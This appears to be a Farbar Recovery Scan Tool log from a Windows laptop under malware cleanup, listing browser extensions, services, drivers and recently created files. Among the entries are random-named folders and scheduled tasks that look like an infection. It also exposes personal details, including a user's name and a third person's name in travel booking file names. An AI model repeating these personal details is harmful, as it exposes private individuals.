      BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-15] (Microsoft Corporation)
      BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
      BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-15] (Microsoft Corporation)
      Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2016-05-17] (Microsoft Corporation)

      FireFox:
      ========
      FF ProfilePath: C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 [2017-02-16]
      FF Homepage: Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 -> hxxps://www.malwarebytes.org/restorebrowser/
      FF Extension: (Video DownloadHelper) - C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-10-30]
      FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
      FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_194.dll [2017-01-11] ()
      FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
      FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
      FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
      FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_194.dll [2017-01-11] ()
      FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1214154.dll [No File]
      FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
      FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
      FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
      FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
      FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-14] (Google Inc.)
      FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-14] (Google Inc.)
      FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
      FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
      FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
      FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-07-19] (Microsoft Corporation)
      FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)

      Chrome:
      =======
      CHR DefaultProfile: ChromeDefaultData
      CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/"
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-16] <==== ATTENTION
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Google Drive) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-09]
      CHR Extension: (YouTube) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-09]
      CHR Extension: (Adobe Acrobat) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Skype) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2017-02-09]
      CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
      CHR Extension: (Warcraft [FVD]) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb [2017-02-14]
      CHR Extension: (Gmail) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default [2017-02-15]
      CHR Extension: (Presentaciones de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-09]
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Google Drive) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-09]
      CHR Extension: (YouTube) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-09]
      CHR Extension: (Adobe Acrobat) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-02-09]
      CHR Extension: (Hojas de cálculo de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
      CHR Extension: (Gmail) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
      CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

      ==================== Services (Whitelisted) ====================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2016-01-29] (Adobe Systems) [File not signed]
      R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
      R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
      R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [79872 2014-01-06] () [File not signed]
      R2 ETDService; C:\Program Files\Elantech\ETDService.exe [99632 2013-10-09] (ELAN Microelectronics Corp.)
      R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
      R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
      R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
      S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
      R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
      R2 Lenovo System Agent Service; C:\Program Files\Lenovo\iMController\SystemAgentService.exe [584664 2015-12-14] (LENOVO INCORPORATED.)
      R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
      R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720792 2014-08-09] (NVIDIA Corporation)
      R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18973144 2014-08-09] (NVIDIA Corporation)
      S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
      S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
      S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

      ===================== Drivers (Whitelisted) ======================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S3 A38CCID; C:\WINDOWS\system32\DRIVERS\a38ccid.sys [82480 2015-08-19] (Advanced Card Systems Ltd.)
      R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
      R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176584 2017-02-15] (Malwarebytes)
      R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-16] (Malwarebytes)
      R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-16] (Malwarebytes)
      R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251848 2017-02-16] (Malwarebytes)
      R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-16] (Malwarebytes)
      R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
      S3 NETwNe64; C:\WINDOWS\system32\DRIVERS\NETwew02.sys [4649440 2013-06-18] (Intel Corporation)
      R3 NIWinCDEmu; C:\WINDOWS\System32\drivers\NIWinCDEmu.sys [111696 2015-05-19] ()
      R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20440 2014-08-09] (NVIDIA Corporation)
      R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
      S3 RDID1079; C:\WINDOWS\system32\Drivers\rdwm1079.sys [199680 2012-10-23] (Roland Corporation)
      R3 RtkBtFilter; C:\WINDOWS\system32\DRIVERS\RtkBtfilter.sys [558296 2014-01-05] (Realtek Semiconductor Corporation)
      R3 rtsuvc; C:\WINDOWS\system32\DRIVERS\rtsuvc.sys [9101016 2013-12-23] (Realtek Semiconductor Corp.)
      R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [2982104 2013-12-26] (Realtek Semiconductor Corporation )
      S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
      S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
      S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
      S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)
      U3 ucdrv; no ImagePath

      ==================== NetSvcs (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


      ==================== One Month Created files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2017-02-16 23:02 - 2017-02-16 23:02 - 00027597 _____ C:\Users\Alberto\Desktop\FRST.txt
      2017-02-16 23:01 - 2017-02-16 23:02 - 00000000 ____D C:\FRST
      2017-02-16 23:01 - 2017-02-16 22:58 - 02422272 _____ (Farbar) C:\Users\Alberto\Desktop\FRST64.exe
      2017-02-16 23:00 - 2017-02-16 23:00 - 00001391 _____ C:\Users\Alberto\Desktop\malwareanalisis2.txt
      2017-02-16 22:54 - 2017-02-16 22:54 - 00002487 _____ C:\Users\Alberto\Desktop\malwareanalisis.txt
      2017-02-16 22:13 - 2017-02-16 22:13 - 00000000 ____D C:\Users\Alberto\Desktop\backups
      2017-02-16 21:54 - 2017-02-16 21:54 - 00388608 _____ (Trend Micro Inc.) C:\Users\Alberto\Desktop\HijackThis.exe
      2017-02-15 23:45 - 2017-02-16 21:40 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
      2017-02-15 23:45 - 2017-02-16 21:40 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
      2017-02-15 23:45 - 2017-02-16 21:40 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
      2017-02-15 23:45 - 2017-02-16 21:40 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
      2017-02-15 23:45 - 2017-02-15 23:45 - 00176584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
      2017-02-15 23:44 - 2017-02-15 23:44 - 00001854 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
      2017-02-15 23:44 - 2017-02-15 23:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
      2017-02-15 23:44 - 2017-02-15 23:44 - 00000000 ____D C:\Program Files\Malwarebytes
      2017-02-15 23:44 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
      2017-02-15 22:26 - 2017-02-15 22:26 - 00352767 _____ C:\Users\Alberto\Downloads\Elecciones gnrales 2016.pptx
      2017-02-15 09:20 - 2017-02-15 09:20 - 00002792 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
      2017-02-15 09:20 - 2017-02-15 09:20 - 00000805 _____ C:\Users\Public\Desktop\CCleaner.lnk
      2017-02-15 09:20 - 2017-02-15 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
      2017-02-15 09:19 - 2017-02-15 09:20 - 00000000 ____D C:\Program Files\CCleaner
      2017-02-15 03:10 - 2017-02-15 03:10 - 08813488 _____ (Piriform Ltd) C:\Users\Alberto\Downloads\ccsetup526.exe
      2017-02-15 03:04 - 2017-02-15 03:05 - 09261616 _____ (Piriform Ltd) C:\Users\Alberto\Downloads\ccsetup527.exe
      2017-02-14 23:10 - 2017-02-16 22:56 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
      2017-02-14 23:10 - 2017-02-16 22:56 - 00001523 _____ C:\Users\Public\Desktop\Google Chrome.lnk
      2017-02-14 23:09 - 2017-02-14 23:09 - 00003532 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
      2017-02-14 23:09 - 2017-02-14 23:09 - 00003404 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
      2017-02-14 23:09 - 2017-02-14 23:09 - 00000000 ____D C:\Users\Alberto\AppData\Local\Deployment
      2017-02-14 23:09 - 2017-02-14 23:09 - 00000000 ____D C:\Users\Alberto\AppData\Local\Apps\2.0
      2017-02-14 20:42 - 2017-02-14 20:42 - 00031202 _____ C:\Users\Alberto\Desktop\CONFIRMACIÓN TRANSFERENCIA.pdf
      2017-02-14 19:40 - 2017-02-14 19:40 - 04015056 _____ C:\Users\Alberto\Downloads\adwcleaner_6.043 (1).exe
      2017-02-14 19:19 - 2017-02-15 23:44 - 00000000 ____D C:\ProgramData\Malwarebytes
      2017-02-14 19:18 - 2017-02-14 19:18 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Obsidium
      2017-02-13 18:16 - 2017-02-13 18:16 - 00030487 _____ C:\Users\Alberto\Desktop\TRANSFERENCIA.pdf
      2017-02-13 13:13 - 2017-02-13 13:13 - 07486639 _____ C:\Users\Alberto\Downloads\psd-blank-white-t-shirt.zip
      2017-02-11 13:24 - 2017-02-11 13:24 - 12210037 _____ C:\Users\Alberto\Downloads\Trabajo final MDP (1).pdf
      2017-02-11 13:22 - 2017-02-11 13:22 - 01157833 _____ C:\Users\Alberto\Downloads\TEMA 3. LNP.pdf
      2017-02-11 13:22 - 2017-02-11 13:22 - 01157833 _____ C:\Users\Alberto\Downloads\TEMA 3. LNP (1).pdf
      2017-02-11 12:59 - 2017-02-11 12:59 - 01633090 _____ C:\Users\Alberto\Downloads\PRESENTACIÓN UT 5 DIFUSIÓN DE MATERIALES PUBLICITARIOS.pptx
      2017-02-09 22:04 - 2017-02-09 22:05 - 55566792 _____ (Malwarebytes ) C:\Users\Alberto\Downloads\mb3-setup-consumer-3.0.6.1469.exe
      2017-02-09 20:49 - 2017-02-10 00:25 - 00000000 ____D C:\Program Files\GridinSoft Anti-Malware
      2017-02-09 20:49 - 2017-02-09 22:22 - 00003280 _____ C:\WINDOWS\System32\Tasks\GridinSoft Anti-Malware
      2017-02-09 20:49 - 2017-02-09 20:49 - 00000000 ____D C:\ProgramData\GridinSoft
      2017-02-09 19:16 - 2017-02-09 19:16 - 00000000 _____ C:\autoexec.bat
      2017-02-09 19:15 - 2017-02-16 21:42 - 00000000 ___RD C:\Users\Alberto\Creative Cloud Files
      2017-02-09 19:11 - 2017-02-09 19:11 - 00000000 ____D C:\ProgramData\Lavasoft
      2017-02-09 18:41 - 2017-02-09 22:04 - 00004297 _____ C:\InfoSat.txt
      2017-02-09 18:41 - 2017-02-09 17:01 - 00006661 _____ C:\WINDOWS\system32\Drivers\etc\Hosts(2017-02-09 184119)
      2017-02-09 17:33 - 2017-02-09 17:33 - 00003094 _____ C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300}
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avira
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avg
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\AVAST Software
      2017-02-09 17:03 - 2017-02-09 17:57 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Thugagh
      2017-02-09 17:03 - 2017-02-09 17:10 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zicsythifetain
      2017-02-09 17:03 - 2017-02-09 17:03 - 00006096 _____ C:\WINDOWS\System32\Tasks\Erwushprazase Configuration
      2017-02-09 17:03 - 2017-02-09 17:03 - 00005058 _____ C:\WINDOWS\System32\Tasks\Chevuge
      2017-02-09 17:01 - 2017-02-09 17:01 - 00720033 _____ C:\WINDOWS\unins000.exe
      2017-02-09 17:01 - 2017-02-09 17:01 - 00035871 _____ C:\WINDOWS\unins000.dat
      2017-02-09 17:00 - 2017-02-09 17:00 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zujerle
      2017-02-09 13:30 - 2017-02-09 13:30 - 00000000 ____D C:\Users\Alberto\AppData\Local\UCBrowser
      2017-02-09 12:58 - 2017-02-09 12:58 - 00000282 __RSH C:\Users\Alberto\ntuser.pol
      2017-02-09 12:51 - 2017-02-09 12:51 - 04015056 _____ C:\Users\Alberto\Downloads\adwcleaner_6.043.exe
      2017-02-09 12:51 - 2017-02-09 12:51 - 04015056 _____ C:\Users\Alberto\Desktop\adwcleaner_6.043.exe
      2017-02-09 12:48 - 2017-02-09 17:23 - 00000000 ____D C:\WINDOWS\system32\SSL
      2017-02-09 12:40 - 2017-02-09 12:40 - 06774784 _____ C:\Users\Alberto\Downloads\Sin confirmar 701977.crdownload
      2017-02-09 12:06 - 2017-02-09 12:06 - 00001105 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2017.lnk
      2017-02-09 12:01 - 2017-02-09 12:01 - 00000000 ____D C:\Users\Alberto\Documents\Toontrack
      2017-02-09 12:01 - 2017-02-09 12:01 - 00000000 ____D C:\ProgramData\Toontrack
      2017-02-09 12:00 - 2017-02-09 12:00 - 00001093 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2017.lnk
      2017-02-09 11:50 - 2017-02-16 21:42 - 00000000 ____D C:\ProgramData\boost_interprocess
      2017-02-09 11:40 - 2017-02-09 11:40 - 00001256 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
      2017-02-08 23:38 - 2017-02-08 23:39 - 63958782 _____ C:\Users\Alberto\Downloads\Glow Run 5K Puebla 2015.mov
      2017-02-08 22:42 - 2017-02-08 22:42 - 03444311 _____ C:\Users\Alberto\Downloads\green screen paint splat.mov
      2017-02-08 22:36 - 2017-02-08 22:36 - 03876609 _____ C:\Users\Alberto\Downloads\Free Slow Motion Footage Red Paint Splatter.mov
      2017-02-07 15:53 - 2017-02-07 15:53 - 03086008 _____ C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe
      2017-02-05 23:23 - 2017-02-06 10:28 - 16484059 _____ C:\Users\Alberto\Desktop\colplay-foto grande agrupado.psd
      2017-02-05 22:36 - 2017-02-05 23:22 - 16753315 _____ C:\Users\Alberto\Desktop\colplay-foto grande.psd
      2017-02-05 22:17 - 2017-02-05 22:17 - 00090717 _____ C:\Users\Alberto\Downloads\colplay-foto-2 (1).svg
      2017-02-05 22:16 - 2017-02-05 22:16 - 00059783 _____ C:\Users\Alberto\Downloads\colplay-foto-2 (1).pdf
      2017-02-05 22:14 - 2017-02-05 22:15 - 12550329 _____ C:\Users\Alberto\Downloads\colplay-foto-2.eps
      2017-02-05 22:13 - 2017-02-05 22:13 - 06993061 _____ C:\Users\Alberto\Downloads\colplay-foto-2.pdf
      2017-02-05 22:12 - 2017-02-05 22:12 - 07569607 _____ C:\Users\Alberto\Downloads\colplay-foto-2.svg
      2017-02-05 22:07 - 2017-02-05 22:07 - 51137209 _____ C:\Users\Alberto\Desktop\colplay foto 2.psd
      2017-02-05 21:49 - 2017-02-05 23:46 - 38017806 _____ C:\Users\Alberto\Desktop\colplay foto.psd
      2017-02-03 01:44 - 2017-02-03 01:53 - 00000000 ____D C:\Users\Alberto\Images
      2017-02-03 01:18 - 2017-02-03 01:18 - 00000000 ____D C:\Program Files\Audio
      2017-02-02 22:28 - 2017-02-02 22:28 - 09297545 _____ C:\Users\Alberto\Downloads\TEMAZO (1).wma
      2017-02-01 12:41 - 2017-02-03 01:53 - 00000000 ____D C:\Users\Alberto\Audio
      2017-02-01 00:32 - 2017-02-01 00:32 - 00007258 _____ C:\Users\Alberto\Downloads\ACTIVIDAD UT5.odt
      2017-01-30 10:04 - 2017-01-30 10:05 - 00000000 ____D C:\Users\Alberto\Desktop\frute
      2017-01-26 13:54 - 2017-02-09 14:23 - 00000000 ____D C:\Users\Alberto\Desktop\PROYECTO DE PRUEBA
      2017-01-26 08:33 - 2017-01-26 08:33 - 00251549 _____ C:\Users\Alberto\Downloads\Presentación1.pptx
      2017-01-25 11:35 - 2017-01-25 11:35 - 00471347 _____ C:\Users\Alberto\Downloads\oranges-and-cherrys_Vector-Pattern.zip
      2017-01-24 20:25 - 2017-01-24 20:25 - 00920051 _____ C:\Users\Alberto\Downloads\-HibiscusPatterns.pat.zip
      2017-01-24 20:24 - 2017-01-24 20:24 - 16405314 _____ C:\Users\Alberto\Downloads\-12-webtreats-grunge-stripes.zip
      2017-01-24 20:23 - 2017-01-24 20:23 - 02370088 _____ C:\Users\Alberto\Downloads\fruit_and_vegetable_pattern_310757 (1).zip
      2017-01-24 20:21 - 2017-01-24 20:22 - 02370088 _____ C:\Users\Alberto\Downloads\fruit_and_vegetable_pattern_310757.zip
      2017-01-24 19:36 - 2017-01-24 19:36 - 02949093 _____ C:\Users\Alberto\Downloads\Food_Icons_PSD_Set.zip
      2017-01-24 19:30 - 2017-01-24 19:30 - 01063319 _____ C:\Users\Alberto\Downloads\kitchen_flat_icons_01_ai.zip
      2017-01-24 18:37 - 2017-01-24 18:37 - 01808832 _____ C:\Users\Alberto\Downloads\UNIDAD DE TRABAJO Nº 6.pdf
      2017-01-23 21:52 - 2017-01-23 21:52 - 01777080 _____ C:\Users\Alberto\Downloads\Happy_Little_Halloween_Patterns_by_HadriART.rar
      2017-01-23 21:35 - 2017-01-23 21:35 - 00026973 _____ C:\Users\Alberto\Downloads\Breakfreebie.pat.zip
      2017-01-23 11:58 - 2017-01-23 11:58 - 00149614 _____ C:\Users\Alberto\Downloads\horros.zip
      2017-01-23 11:57 - 2017-01-23 11:57 - 00018572 _____ C:\Users\Alberto\Downloads\delta-echo.zip
      2017-01-23 10:35 - 2017-01-23 10:35 - 00478154 _____ C:\Users\Alberto\Downloads\pdf2doc (1).zip
      2017-01-23 10:34 - 2017-01-23 10:34 - 00431235 _____ C:\Users\Alberto\Desktop\hoja_reclamaciones_enero07.pdf
      2017-01-23 10:28 - 2017-01-23 10:28 - 00033435 _____ C:\Users\Alberto\Downloads\pdf2doc.zip
      2017-01-21 11:23 - 2017-01-21 11:23 - 00044350 _____ C:\Users\Alberto\Downloads\Recibo de pasaje electrónico%2c 08 abril para MS FLOR DE LIZ CORTEZ FOSADO.pdf
      2017-01-21 11:22 - 2017-01-21 11:22 - 00038456 _____ C:\Users\Alberto\Downloads\Reserva de viaje 08 abril para MS FLOR DE LIZ CORTEZ FOSADO.pdf
      2017-01-21 11:14 - 2017-01-21 11:14 - 00011812 _____ C:\Users\Alberto\Downloads\Informacion de la reserva de CORTEZFOSADO - FLOR DE LIZ - 2KIOXH.pdf

      ==================== One Month Modified files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2017-02-16 23:01 - 2014-09-16 23:08 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1830392043-3884525579-1098650476-1002
      2017-02-16 22:09 - 2015-01-30 16:35 - 00000838 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
      2017-02-16 21:42 - 2014-12-12 03:46 - 00000000 ____D C:\Users\Alberto\AppData\Local\Adobe
      2017-02-16 21:40 - 2014-09-16 23:05 - 00000000 __RDO C:\Users\Alberto\OneDrive
      2017-02-16 21:39 - 2013-08-22 14:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
      2017-02-16 18:33 - 2014-09-16 23:12 - 00003982 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{0AA9FC2E-101A-43C8-BF68-4825711875FD}
      2017-02-16 03:16 - 2015-01-18 02:56 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Skype
      2017-02-15 23:57 - 2013-08-22 13:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
      2017-02-15 23:56 - 2015-12-05 02:55 - 00000000 ____D C:\AdwCleaner
      2017-02-15 23:47 - 2014-05-10 00:08 - 00812192 _____ C:\WINDOWS\system32\perfh00A.dat
      2017-02-15 23:47 - 2014-05-10 00:08 - 00167450 _____ C:\WINDOWS\system32\perfc00A.dat
